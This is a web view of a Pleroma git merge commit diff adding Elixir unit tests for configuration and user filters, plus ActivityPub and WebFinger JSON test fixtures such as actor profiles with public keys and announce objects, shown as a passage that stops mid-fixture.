diff options
| author | rinpatch <rinpatch@sdf.org> | 2018-12-01 18:12:27 +0300 | 
|---|---|---|
| committer | rinpatch <rinpatch@sdf.org> | 2018-12-01 18:12:27 +0300 | 
| commit | fe2759bc9f2dad044b49f4954693ac09f9368041 (patch) | |
| tree | 59dd9c5026f433d976defa303de0d6782d435d1e /test | |
| parent | ba6e3eba33f16bdd2fede086d5fb5c86201cb57b (diff) | |
| parent | 8c3ff06e35e11a40cf4eb35a41a2019b7496e62c (diff) | |
| download | pleroma-fe2759bc9f2dad044b49f4954693ac09f9368041.tar.gz pleroma-fe2759bc9f2dad044b49f4954693ac09f9368041.zip | |
Attempt to resolve merge conflict
Diffstat (limited to 'test')
63 files changed, 3351 insertions, 214 deletions
| diff --git a/test/config_test.exs b/test/config_test.exs new file mode 100644 index 000000000..837cbb30c --- /dev/null +++ b/test/config_test.exs @@ -0,0 +1,71 @@ +defmodule Pleroma.ConfigTest do +  use ExUnit.Case + +  test "get/1 with an atom" do +    assert Pleroma.Config.get(:instance) == Application.get_env(:pleroma, :instance) +    assert Pleroma.Config.get(:azertyuiop) == nil +    assert Pleroma.Config.get(:azertyuiop, true) == true +  end + +  test "get/1 with a list of keys" do +    assert Pleroma.Config.get([:instance, :public]) == +             Keyword.get(Application.get_env(:pleroma, :instance), :public) + +    assert Pleroma.Config.get([Pleroma.Web.Endpoint, :render_errors, :view]) == +             get_in( +               Application.get_env( +                 :pleroma, +                 Pleroma.Web.Endpoint +               ), +               [:render_errors, :view] +             ) + +    assert Pleroma.Config.get([:azerty, :uiop]) == nil +    assert Pleroma.Config.get([:azerty, :uiop], true) == true +  end + +  test "get!/1" do +    assert Pleroma.Config.get!(:instance) == Application.get_env(:pleroma, :instance) + +    assert Pleroma.Config.get!([:instance, :public]) == +             Keyword.get(Application.get_env(:pleroma, :instance), :public) + +    assert_raise(Pleroma.Config.Error, fn -> +      Pleroma.Config.get!(:azertyuiop) +    end) + +    assert_raise(Pleroma.Config.Error, fn -> +      Pleroma.Config.get!([:azerty, :uiop]) +    end) +  end + +  test "put/2 with a key" do +    Pleroma.Config.put(:config_test, true) + +    assert Pleroma.Config.get(:config_test) == true +  end + +  test "put/2 with a list of keys" do +    Pleroma.Config.put([:instance, :config_test], true) +    Pleroma.Config.put([:instance, :config_nested_test], []) +    Pleroma.Config.put([:instance, :config_nested_test, :x], true) + +    assert Pleroma.Config.get([:instance, :config_test]) == true +    assert Pleroma.Config.get([:instance, :config_nested_test, :x]) == true +  end + +  test "delete/1 with a key" do +    Pleroma.Config.put([:delete_me], :delete_me) +    Pleroma.Config.delete([:delete_me]) +    assert Pleroma.Config.get([:delete_me]) == nil +  end + +  test "delete/2 with a list of keys" do +    Pleroma.Config.put([:delete_me], hello: "world", world: "Hello") +    Pleroma.Config.delete([:delete_me, :world]) +    assert Pleroma.Config.get([:delete_me]) == [hello: "world"] +    Pleroma.Config.put([:delete_me, :delete_me], hello: "world", world: "Hello") +    Pleroma.Config.delete([:delete_me, :delete_me, :world]) +    assert Pleroma.Config.get([:delete_me, :delete_me]) == [hello: "world"] +  end +end diff --git a/test/filter_test.exs b/test/filter_test.exs new file mode 100644 index 000000000..509c15317 --- /dev/null +++ b/test/filter_test.exs @@ -0,0 +1,154 @@ +defmodule Pleroma.FilterTest do +  alias Pleroma.{User, Repo} +  use Pleroma.DataCase + +  import Pleroma.Factory +  import Ecto.Query + +  describe "creating filters" do +    test "creating one filter" do +      user = insert(:user) + +      query = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 42, +        phrase: "knights", +        context: ["home"] +      } + +      {:ok, %Pleroma.Filter{} = filter} = Pleroma.Filter.create(query) +      result = Pleroma.Filter.get(filter.filter_id, user) +      assert query.phrase == result.phrase +    end + +    test "creating one filter without a pre-defined filter_id" do +      user = insert(:user) + +      query = %Pleroma.Filter{ +        user_id: user.id, +        phrase: "knights", +        context: ["home"] +      } + +      {:ok, %Pleroma.Filter{} = filter} = Pleroma.Filter.create(query) +      # Should start at 1 +      assert filter.filter_id == 1 +    end + +    test "creating additional filters uses previous highest filter_id + 1" do +      user = insert(:user) + +      query_one = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 42, +        phrase: "knights", +        context: ["home"] +      } + +      {:ok, %Pleroma.Filter{} = filter_one} = Pleroma.Filter.create(query_one) + +      query_two = %Pleroma.Filter{ +        user_id: user.id, +        # No filter_id +        phrase: "who", +        context: ["home"] +      } + +      {:ok, %Pleroma.Filter{} = filter_two} = Pleroma.Filter.create(query_two) +      assert filter_two.filter_id == filter_one.filter_id + 1 +    end + +    test "filter_id is unique per user" do +      user_one = insert(:user) +      user_two = insert(:user) + +      query_one = %Pleroma.Filter{ +        user_id: user_one.id, +        phrase: "knights", +        context: ["home"] +      } + +      {:ok, %Pleroma.Filter{} = filter_one} = Pleroma.Filter.create(query_one) + +      query_two = %Pleroma.Filter{ +        user_id: user_two.id, +        phrase: "who", +        context: ["home"] +      } + +      {:ok, %Pleroma.Filter{} = filter_two} = Pleroma.Filter.create(query_two) + +      assert filter_one.filter_id == 1 +      assert filter_two.filter_id == 1 + +      result_one = Pleroma.Filter.get(filter_one.filter_id, user_one) +      assert result_one.phrase == filter_one.phrase + +      result_two = Pleroma.Filter.get(filter_two.filter_id, user_two) +      assert result_two.phrase == filter_two.phrase +    end +  end + +  test "deleting a filter" do +    user = insert(:user) + +    query = %Pleroma.Filter{ +      user_id: user.id, +      filter_id: 0, +      phrase: "knights", +      context: ["home"] +    } + +    {:ok, filter} = Pleroma.Filter.create(query) +    {:ok, filter} = Pleroma.Filter.delete(query) +    assert is_nil(Repo.get(Pleroma.Filter, filter.filter_id)) +  end + +  test "getting all filters by an user" do +    user = insert(:user) + +    query_one = %Pleroma.Filter{ +      user_id: user.id, +      filter_id: 1, +      phrase: "knights", +      context: ["home"] +    } + +    query_two = %Pleroma.Filter{ +      user_id: user.id, +      filter_id: 2, +      phrase: "who", +      context: ["home"] +    } + +    {:ok, filter_one} = Pleroma.Filter.create(query_one) +    {:ok, filter_two} = Pleroma.Filter.create(query_two) +    filters = Pleroma.Filter.get_filters(user) +    assert filter_one in filters +    assert filter_two in filters +  end + +  test "updating a filter" do +    user = insert(:user) + +    query_one = %Pleroma.Filter{ +      user_id: user.id, +      filter_id: 1, +      phrase: "knights", +      context: ["home"] +    } + +    query_two = %Pleroma.Filter{ +      user_id: user.id, +      filter_id: 1, +      phrase: "who", +      context: ["home", "timeline"] +    } + +    {:ok, filter_one} = Pleroma.Filter.create(query_one) +    {:ok, filter_two} = Pleroma.Filter.update(query_two) +    assert filter_one != filter_two +    assert filter_two.phrase == query_two.phrase +    assert filter_two.context == query_two.context +  end +end diff --git a/test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json b/test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json new file mode 100644 index 000000000..5c7c9c6d3 --- /dev/null +++ b/test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json @@ -0,0 +1,55 @@ +{ +    "@context": [ +        "https://www.w3.org/ns/activitystreams", +        "https://w3id.org/security/v1", +        { +            "manuallyApprovesFollowers": "as:manuallyApprovesFollowers", +            "sensitive": "as:sensitive", +            "movedTo": { +                "@id": "as:movedTo", +                "@type": "@id" +            }, +            "Hashtag": "as:Hashtag", +            "ostatus": "http://ostatus.org#", +            "atomUri": "ostatus:atomUri", +            "inReplyToAtomUri": "ostatus:inReplyToAtomUri", +            "conversation": "ostatus:conversation", +            "toot": "http://joinmastodon.org/ns#", +            "Emoji": "toot:Emoji", +            "focalPoint": { +                "@container": "@list", +                "@id": "toot:focalPoint" +            }, +            "featured": { +                "@id": "toot:featured", +                "@type": "@id" +            }, +            "schema": "http://schema.org#", +            "PropertyValue": "schema:PropertyValue", +            "value": "schema:value" +        } +    ], +    "id": "http://mastodon.example.org/users/admin/statuses/100787282858396771", +    "type": "Note", +    "summary": null, +    "inReplyTo": null, +    "published": "2018-09-25T16:11:29Z", +    "url": "https://mastodon.example.org/@admin/100787282858396771", +    "attributedTo": "http://mastodon.example.org/users/admin", +    "to": [ +        "https://www.w3.org/ns/activitystreams#Public" +    ], +    "cc": [ +        "http://mastodon.example.org/users/admin/followers" +    ], +    "sensitive": false, +    "atomUri": "http://mastodon.example.org/users/admin/statuses/100787282858396771", +    "inReplyToAtomUri": null, +    "conversation": "tag:mastodon.social,2018-09-25:objectId=55659382:objectType=Conversation", +    "content": "<p>the name's jond (jeans bond)</p>", +    "contentMap": { +        "en": "<p>the name's jond (jeans bond)</p>" +    }, +    "attachment": [], +    "tag": [] +} diff --git a/test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json b/test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json new file mode 100644 index 000000000..9dabf0e52 --- /dev/null +++ b/test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json @@ -0,0 +1,17 @@ +{ +    "@context": "https://www.w3.org/ns/activitystreams", +    "id": "https://info.pleroma.site/actor.json", +    "type": "Person", +    "following": "https://info.pleroma.site/following.json", +    "followers": "https://info.pleroma.site/followers.json", +    "inbox": "https://info.pleroma.site/inbox.json", +    "outbox": "https://info.pleroma.site/outbox.json", +    "preferredUsername": "admin", +    "name": null, +    "summary": "<p></p>", +    "publicKey": { +        "id": "https://info.pleroma.site/actor.json#main-key", +        "owner": "https://info.pleroma.site/actor.json", +        "publicKeyPem": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtc4Tir+3ADhSNF6VKrtW\nOU32T01w7V0yshmQei38YyiVwVvFu8XOP6ACchkdxbJ+C9mZud8qWaRJKVbFTMUG\nNX4+6Q+FobyuKrwN7CEwhDALZtaN2IPbaPd6uG1B7QhWorrY+yFa8f2TBM3BxnUy\nI4T+bMIZIEYG7KtljCBoQXuTQmGtuffO0UwJksidg2ffCF5Q+K//JfQagJ3UzrR+\nZXbKMJdAw4bCVJYs4Z5EhHYBwQWiXCyMGTd7BGlmMkY6Av7ZqHKC/owp3/0EWDNz\nNqF09Wcpr3y3e8nA10X40MJqp/wR+1xtxp+YGbq/Cj5hZGBG7etFOmIpVBrDOhry\nBwIDAQAB\n-----END PUBLIC KEY-----\n" +    } +} diff --git a/test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json b/test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json new file mode 100644 index 000000000..c42f3a53c --- /dev/null +++ b/test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json @@ -0,0 +1,54 @@ +{ +    "@context": [ +        "https://www.w3.org/ns/activitystreams", +        "https://w3id.org/security/v1" +    ], +    "type": "Person", +    "id": "https://osada.macgirvin.com/channel/mike", +    "preferredUsername": "mike", +    "name": "Mike Macgirvin (Osada)", +    "updated": "2018-08-29T03:09:11Z", +    "icon": { +        "type": "Image", +        "mediaType": "image/jpeg", +        "updated": "2018-08-29T03:10:13Z", +        "url": "https://osada.macgirvin.com/photo/profile/l/2", +        "height": 300, +        "width": 300 +    }, +    "url": [ +        { +            "type": "Link", +            "mediaType": "text/html", +            "href": "https://osada.macgirvin.com/channel/mike" +        }, +        { +            "type": "Link", +            "mediaType": "text/x-zot+json", +            "href": "https://osada.macgirvin.com/channel/mike" +        } +    ], +    "inbox": "https://osada.macgirvin.com/inbox/mike", +    "outbox": "https://osada.macgirvin.com/outbox/mike", +    "followers": "https://osada.macgirvin.com/followers/mike", +    "following": "https://osada.macgirvin.com/following/mike", +    "endpoints": { +        "sharedInbox": "https://osada.macgirvin.com/inbox" +    }, +    "publicKey": { +        "id": "https://osada.macgirvin.com/channel/mike/public_key_pem", +        "owner": "https://osada.macgirvin.com/channel/mike", +        "publicKeyPem": "-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAskSyK2VwBNKbzZl9XNJk\nvxU5AAilmRArMmmKSzphdHaVBHakeafUfixvqNrQ/oX2srJvJKcghNmEMrJ6MJ7r\npeEndVOo7pcP4PwVjtnC06p3J711q5tBehqM25BfCLCrB2YqWF6c8zk3CPN3Na21\n8k5s4cO95N/rGN+Po0XFAX/HjKjlpgNpKRDrpxmXxTU8NZfAqeQGJ5oiMBZI9vVB\n+eU7t1L6F5/XWuUCeP4OMrG8oZX822AREba8rknS6DpkWGES0Rx2eNOyYTf6ue75\nI6Ek6rlO+da5wMWr+3BvYMq4JMIwTHzAO+ZqqJPFpzKSiVuAWb2DOX/MDFecVWJE\ntF/R60lONxe4e/00MPCoDdqkLKdwROsk1yGL7z4Zk6jOWFEhIcWy/d2Ya5CpPvS3\nu4wNN4jkYAjra+8TiloRELhV4gpcEk8nkyNwLXOhYm7zQ5sIc5rfXoIrFzALB86W\nG05Nnqg+77zZIaTZpD9qekYlaEt+0OVtt9TTIeTiudQ983l6mfKwZYymrzymH1dL\nVgxBRYo+Z53QOSLiSKELfTBZxEoP1pBw6RiOHXydmJ/39hGgc2YAY/5ADwW2F2yb\nJ7+gxG6bPJ3ikDLYcD4CB5iJQdnTcDsFt3jyHAT6wOCzFAYPbHUqtzHfUM30dZBn\nnJhQF8udPLcXLaj6GW75JacCAwEAAQ==\n-----END PUBLIC KEY-----\n" +    }, +    "signature": { +        "@context": [ +            "https://www.w3.org/ns/activitystreams", +            "https://w3id.org/security/v1" +        ], +        "type": "RsaSignature2017", +        "nonce": "bd60167a764a936788d9538531284dfacc258daae0297bc34a83bce136dedb5d", +        "creator": "https://osada.macgirvin.com/channel/mike/public_key_pem", +        "created": "2018-10-17T07:16:28Z", +        "signatureValue": "WbfFVIPImkd3yNu6brz0CvZaeV242rwAbH0vy8DM4vfnXCxLr5Uv/Wj9gwP+tbooTxGaahAKBeqlGkQp8RLEo37LATrKMRLA/0V6DeeV+C5ORWR9B4WxyWiD3s/9Wf+KesFMtktNLAcMZ5PfnOS/xNYerhnpkp/gWPxtkglmLIWJv+w18A5zZ01JCxsO4QljHbhYaEUPHUfQ97abrkLECeam+FThVwdO6BFCtbjoNXHfzjpSZL/oKyBpi5/fpnqMqOLOQPs5WgBBZJvjEYYkQcoPTyxYI5NGpNbzIjGHPQNuACnOelH16A7L+q4swLWDIaEFeXQ2/5bmqVKZDZZ6usNP4QyTVszwd8jqo27qcDTNibXDUTsTdKpNQvM/3UncBuzuzmUV3FczhtGshIU1/pRVZiQycpVqPlGLvXhP/yZCe+1siyqDd+3uMaS2vkHTObSl5r+VYof+c+TcjrZXHSWnQTg8/X3zkoBWosrQ93VZcwjzMxQoARYv6rphbOoTz7RPmGAXYUt3/PDWkqDlmQDwCpLNNkJo1EidyefZBdD9HXQpCBO0ZU0NHb0JmPvg/+zU0krxlv70bm3RHA/maBETVjroIWzt7EwQEg5pL2hVnvSBG+1wF3BtRVe77etkPOHxLnYYIcAMLlVKCcgDd89DPIziQyruvkx1busHI08=" +    } +} diff --git a/test/fixtures/httpoison_mock/https___prismo.news__mxb.json b/test/fixtures/httpoison_mock/https___prismo.news__mxb.json new file mode 100644 index 000000000..a2fe53117 --- /dev/null +++ b/test/fixtures/httpoison_mock/https___prismo.news__mxb.json @@ -0,0 +1 @@ +{"id":"https://prismo.news/@mxb","type":"Person","name":"mxb","preferredUsername":"mxb","summary":"Creator of △ Prismo\r\n\r\nFollow me at @mb@mstdn.io","inbox":"https://prismo.news/ap/accounts/mxb/inbox","outbox":"https://prismo.news/ap/accounts/mxb/outbox","url":"https://prismo.news/@mxb","publicKey":{"id":"https://prismo.news/@mxb#main-key","owner":"https://prismo.news/@mxb","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA41gqLkBYuPLurC2TarF8\nbdyvqP54XzKyScJ6iPNkk4D4plYdWUVj0aOIHQ8LVfBeziH83jDMpRegm1sRLpNG\n1Ti+SzlWyTwugJ8wfQvwJL7iEzqhuPFddjPLpv0djMptvm5vtG6u6O3g4RpX12bv\n4pYRoMStPSv9KRKD/8Naw5Nv85PIWRc9rOly/EoVZBnbesroo69caiGthgChE2pa\niisQ5CEgj/615WUlUATkz3VdExKQkQOdeVABheIvcS5OsMurXnpWyLQ4n9WalNvF\nlJc08aOTIo4plsLAvdcGRDsBzio4qPok3jgzPpFkDqe+02WG/QMPT9VrzKO49N5R\nqQIDAQAB\n-----END PUBLIC KEY-----\n"},"icon":{"type":"Image","url":"https://prismo.s3.wasabisys.com/account/1/avatar/size_400-b6e570850878684362ba3b4bd9ceb007.jpg","media_type":null},"@context":["https://www.w3.org/ns/activitystreams","https://w3id.org/security/v1",{"Hashtag":"as:Hashtag"},{"votes":{"@id":"as:votes","@type":"@id"}}]}
\ No newline at end of file diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json new file mode 100644 index 000000000..a0dc4c830 --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json @@ -0,0 +1,14 @@ +{ +        "@context": "https://www.w3.org/ns/activitystreams", +        "actor": "http://mastodon.example.org/users/admin", +        "attachment": [], +        "attributedTo": "http://mastodon.example.org/users/admin", +        "content": "<p>this post was not actually written by Haelwenn</p>", +        "id": "https://info.pleroma.site/activity.json", +        "published": "2018-09-01T22:15:00Z", +        "tag": [], +        "to": [ +            "https://www.w3.org/ns/activitystreams#Public" +        ], +        "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json new file mode 100644 index 000000000..b16a9279b --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json @@ -0,0 +1,14 @@ +{ +        "@context": "https://www.w3.org/ns/activitystreams", +        "attributedTo": "https://info.pleroma.site/actor.json", +        "attachment": [], +        "actor": "http://mastodon.example.org/users/admin", +        "content": "<p>this post was not actually written by Haelwenn</p>", +        "id": "https://info.pleroma.site/activity2.json", +        "published": "2018-09-01T22:15:00Z", +        "tag": [], +        "to": [ +            "https://www.w3.org/ns/activitystreams#Public" +        ], +        "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json new file mode 100644 index 000000000..1df73f2c5 --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json @@ -0,0 +1,13 @@ +{ +        "@context": "https://www.w3.org/ns/activitystreams", +        "attributedTo": "http://mastodon.example.org/users/admin", +        "attachment": [], +        "content": "<p>this post was not actually written by Haelwenn</p>", +        "id": "https://info.pleroma.site/activity2.json", +        "published": "2018-09-01T22:15:00Z", +        "tag": [], +        "to": [ +            "https://www.w3.org/ns/activitystreams#Public" +        ], +        "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json new file mode 100644 index 000000000..57a73b12a --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json @@ -0,0 +1,13 @@ +{ +        "@context": "https://www.w3.org/ns/activitystreams", +        "attributedTo": "http://mastodon.example.org/users/admin", +        "attachment": [], +        "content": "<p>this post was not actually written by Haelwenn</p>", +        "id": "http://mastodon.example.org/users/admin/activities/1234", +        "published": "2018-09-01T22:15:00Z", +        "tag": [], +        "to": [ +            "https://www.w3.org/ns/activitystreams#Public" +        ], +        "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json b/test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json new file mode 100644 index 000000000..fe6b83ca6 --- /dev/null +++ b/test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json @@ -0,0 +1,53 @@ +{ +    "subject": "acct:mike@osada.macgirvin.com", +    "aliases": [ +        "https://osada.macgirvin.com/channel/mike", +        "https://osada.macgirvin.com/~mike", +        "https://osada.macgirvin.com/@mike" +    ], +    "properties": { +        "http://webfinger.net/ns/name": "Mike Macgirvin (Osada)", +        "http://xmlns.com/foaf/0.1/name": "Mike Macgirvin (Osada)", +        "https://w3id.org/security/v1#publicKeyPem": "-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAskSyK2VwBNKbzZl9XNJk\nvxU5AAilmRArMmmKSzphdHaVBHakeafUfixvqNrQ/oX2srJvJKcghNmEMrJ6MJ7r\npeEndVOo7pcP4PwVjtnC06p3J711q5tBehqM25BfCLCrB2YqWF6c8zk3CPN3Na21\n8k5s4cO95N/rGN+Po0XFAX/HjKjlpgNpKRDrpxmXxTU8NZfAqeQGJ5oiMBZI9vVB\n+eU7t1L6F5/XWuUCeP4OMrG8oZX822AREba8rknS6DpkWGES0Rx2eNOyYTf6ue75\nI6Ek6rlO+da5wMWr+3BvYMq4JMIwTHzAO+ZqqJPFpzKSiVuAWb2DOX/MDFecVWJE\ntF/R60lONxe4e/00MPCoDdqkLKdwROsk1yGL7z4Zk6jOWFEhIcWy/d2Ya5CpPvS3\nu4wNN4jkYAjra+8TiloRELhV4gpcEk8nkyNwLXOhYm7zQ5sIc5rfXoIrFzALB86W\nG05Nnqg+77zZIaTZpD9qekYlaEt+0OVtt9TTIeTiudQ983l6mfKwZYymrzymH1dL\nVgxBRYo+Z53QOSLiSKELfTBZxEoP1pBw6RiOHXydmJ/39hGgc2YAY/5ADwW2F2yb\nJ7+gxG6bPJ3ikDLYcD4CB5iJQdnTcDsFt3jyHAT6wOCzFAYPbHUqtzHfUM30dZBn\nnJhQF8udPLcXLaj6GW75JacCAwEAAQ==\n-----END PUBLIC KEY-----\n", +        "http://purl.org/zot/federation": "zot6,activitypub" +    }, +    "links": [ +        { +            "rel": "http://webfinger.net/rel/avatar", +            "type": "image/jpeg", +            "href": "https://osada.macgirvin.com/photo/profile/l/2" +        }, +        { +            "rel": "http://webfinger.net/rel/blog", +            "href": "https://osada.macgirvin.com/channel/mike" +        }, +        { +            "rel": "http://openid.net/specs/connect/1.0/issuer", +            "href": "https://osada.macgirvin.com" +        }, +        { +            "rel": "http://purl.org/zot/protocol/6.0", +            "type": "application/x-zot+json", +            "href": "https://osada.macgirvin.com/channel/mike" +        }, +        { +            "rel": "http://purl.org/openwebauth/v1", +            "type": "application/x-zot+json", +            "href": "https://osada.macgirvin.com/owa" +        }, +        { +            "rel": "http://ostatus.org/schema/1.0/subscribe", +            "template": "https://osada.macgirvin.com/follow?url={uri}" +        }, +        { +            "rel": "self", +            "type": "application/ld+json; profile=\"https://www.w3.org/ns/activitystreams\"", +            "href": "https://osada.macgirvin.com/channel/mike" +        }, +        { +            "rel": "self", +            "type": "application/activity+json", +            "href": "https://osada.macgirvin.com/channel/mike" +        } +    ] +} diff --git a/test/fixtures/kroeg-announce-with-inline-actor.json b/test/fixtures/kroeg-announce-with-inline-actor.json new file mode 100644 index 000000000..7bd6e8199 --- /dev/null +++ b/test/fixtures/kroeg-announce-with-inline-actor.json @@ -0,0 +1 @@ +{"@context":["https://www.w3.org/ns/activitystreams","https://puckipedia.com/-/context"],"actor":{"endpoints":"https://puckipedia.com/#endpoints","followers":"https://puckipedia.com/followers","following":"https://puckipedia.com/following","icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/images/avatar.png"},"id":"https://puckipedia.com/","inbox":"https://puckipedia.com/inbox","kroeg:blocks":{"id":"https://puckipedia.com/blocks"},"liked":"https://puckipedia.com/liked","manuallyApprovesFollowers":false,"name":"HACKER TEEN PUCKIPEDIA 👩💻","outbox":"https://puckipedia.com/outbox","preferredUsername":"puckipedia","publicKey":{"id":"https://puckipedia.com/#key","owner":"https://puckipedia.com/","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvN05xIcFE0Qgany7Rht4\n0ZI5wu++IT7K5iSqRimBYkpoeHbVcT9RFlW+aWH/QJJW/YgZ7+LMr8AMCrKrwSpS\nCndyrpx4O4lZ3FNRLu7tbklh01rGZfE6R1SFfYBpvMvImc9nYT6iezYDbv6NkHku\no3aVhjql216XlA0OhIrqQme9sAdrLbjbMrTUS8douCTkDOX+JFj1ghHCqdYEMZJI\nOY9kovtgnqyxFLm0RsPGsO1+g/OVojqG+VqHz6O2lceaTVQLlnZ4gOhLVG1tVsA2\nRfXQK+R/VgXncYE+BlQVd/tcdGAz7CDL7PP3rP65gmARnafhGR96cCOi/KzlAXSO\nMwIDAQAB\n-----END PUBLIC KEY-----","type":[]},"summary":"<p>federated hacker teen<br/>\n[<a href=\"https://pronoun.is/she\">she</a>/<a href=\"https://pronoun.is/they\">they</a>]</p>","type":"Person","updated":"2017-12-19T16:56:29.7576707+00:00"},"cc":"http://mastodon.example.org/users/admin","id":"https://puckipedia.com/cc56a9658e","object":{"as:sensitive":false,"attributedTo":{"endpoints":{"sharedInbox":"https://mastodon.social/inbox","type":[]},"followers":"http://mastodon.example.org/users/admin/followers","following":"http://mastodon.example.org/users/admin/following","icon":{"mediaType":"image/png","type":"Image","url":"https://files.mastodon.social/accounts/avatars/000/015/163/original/70ca6c52b01ca913.png"},"id":"http://mastodon.example.org/users/admin","inbox":"http://mastodon.example.org/users/admin/inbox","manuallyApprovesFollowers":{"@value":"False","type":"xsd:boolean"},"name":"","outbox":"http://mastodon.example.org/users/admin/outbox","preferredUsername":"revenant","publicKey":{"id":"http://mastodon.example.org/users/admin#main-key","owner":"http://mastodon.example.org/users/admin","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0gEN3wPW7gkE2gQqnmfB\n1ychjmFIf2LIwY0oCJLiGE/xpZrUKoq+eWH30AP7mATw4LD0gOYABL/ijqPUrPqR\nDXLL+0CqMP8HsZKvRlj9KArMK3YtNiSGGj2U7iReiRrD7nJzjJlsjjJXflLZhZ7/\nenSv1CcaeK8tB0PoAgShy/MyfhPF7WI5/Zm9DmmDQFvUEnDYKXAf/vG/IWw1EyMC\nkbaEYJeIowQU3GsbPxzRGI22bQtfotm431Ch2MbNo+kyzmYVFLAVoSGNMzvJwOPg\nTxLIIBeQXG7MinRyK887yPKhxhcALea4yCcALaa+3jPE7yqwIKYwTHtSlblsHDAo\nmQIDAQAB\n-----END PUBLIC KEY-----\n","type":[]},"summary":"<p>neatly partitioned meats and cheeses appeal to me on an aesthetic level | any pronouns | revenant1.net</p>","type":"Person","url":"https://mastodon.social/@revenant"},"cc":"http://mastodon.example.org/users/admin/followers","content":"<p>the name's jond (jeans bond)</p>","contentMap":{"en":"<p>the name's jond (jeans bond)</p>"},"conversation":"tag:mastodon.social,2018-09-25:objectId=55659382:objectType=Conversation","id":"http://mastodon.example.org/users/admin/statuses/100787282858396771","ostatus:atomUri":"http://mastodon.example.org/users/admin/statuses/100787282858396771","published":"2018-09-25T16:11:29Z","to":"https://www.w3.org/ns/activitystreams#Public","type":"Note","url":"https://mastodon.social/@revenant/100787282858396771"},"to":["https://www.w3.org/ns/activitystreams#Public","https://puckipedia.com/followers"],"type":"Announce"} diff --git a/test/fixtures/kroeg-array-less-emoji.json b/test/fixtures/kroeg-array-less-emoji.json new file mode 100644 index 000000000..3d7025f55 --- /dev/null +++ b/test/fixtures/kroeg-array-less-emoji.json @@ -0,0 +1 @@ +{"@context":["https://www.w3.org/ns/activitystreams","https://puckipedia.com/-/context"],"actor":{"endpoints":"https://puckipedia.com/#endpoints","followers":"https://puckipedia.com/followers","following":"https://puckipedia.com/following","icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/images/avatar.png"},"id":"https://puckipedia.com/","inbox":"https://puckipedia.com/inbox","kroeg:blocks":{"id":"https://puckipedia.com/blocks"},"liked":"https://puckipedia.com/liked","manuallyApprovesFollowers":false,"name":"HACKER TEEN PUCKIPEDIA 👩💻","outbox":"https://puckipedia.com/outbox","preferredUsername":"puckipedia","publicKey":{"id":"https://puckipedia.com/#key","owner":"https://puckipedia.com/","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvN05xIcFE0Qgany7Rht4\n0ZI5wu++IT7K5iSqRimBYkpoeHbVcT9RFlW+aWH/QJJW/YgZ7+LMr8AMCrKrwSpS\nCndyrpx4O4lZ3FNRLu7tbklh01rGZfE6R1SFfYBpvMvImc9nYT6iezYDbv6NkHku\no3aVhjql216XlA0OhIrqQme9sAdrLbjbMrTUS8douCTkDOX+JFj1ghHCqdYEMZJI\nOY9kovtgnqyxFLm0RsPGsO1+g/OVojqG+VqHz6O2lceaTVQLlnZ4gOhLVG1tVsA2\nRfXQK+R/VgXncYE+BlQVd/tcdGAz7CDL7PP3rP65gmARnafhGR96cCOi/KzlAXSO\nMwIDAQAB\n-----END PUBLIC KEY-----","type":[]},"summary":"<p>federated hacker teen<br/>\n[<a href=\"https://pronoun.is/she\">she</a>/<a href=\"https://pronoun.is/they\">they</a>]</p>","type":"Person","updated":"2017-12-19T16:56:29.7576707+00:00"},"cc":"https://puckipedia.com/followers","id":"https://puckipedia.com/1jjx-ob5r","object":{"attributedTo":"https://puckipedia.com/","cc":"https://puckipedia.com/followers","content":"<p>spinning up an extra process that just handles the delivery queue to see what happens. The concept of this working is kind of amusing :icon_e_smile: </p><p>I should probably add back some code to synchronize state between multiple processes; and add back the pubsub mechanism so live streams of collections can return! Also I should add database transactions 